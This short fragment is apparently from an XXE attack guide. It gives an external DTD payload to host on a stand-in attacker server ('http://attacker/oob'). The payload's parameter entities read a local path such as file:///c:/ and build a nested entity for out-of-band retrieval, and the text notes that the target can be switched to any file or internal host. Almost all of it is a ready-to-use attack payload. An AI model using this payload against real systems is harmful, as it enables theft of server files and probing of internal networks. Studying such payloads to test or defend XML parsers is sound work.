On http://attacker/oob add the following content:

<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY %
        trick SYSTEM 'file://:%payl;/%payl;'>">

Here it is possible to change file:///c:/ to any directory/file or internal host.
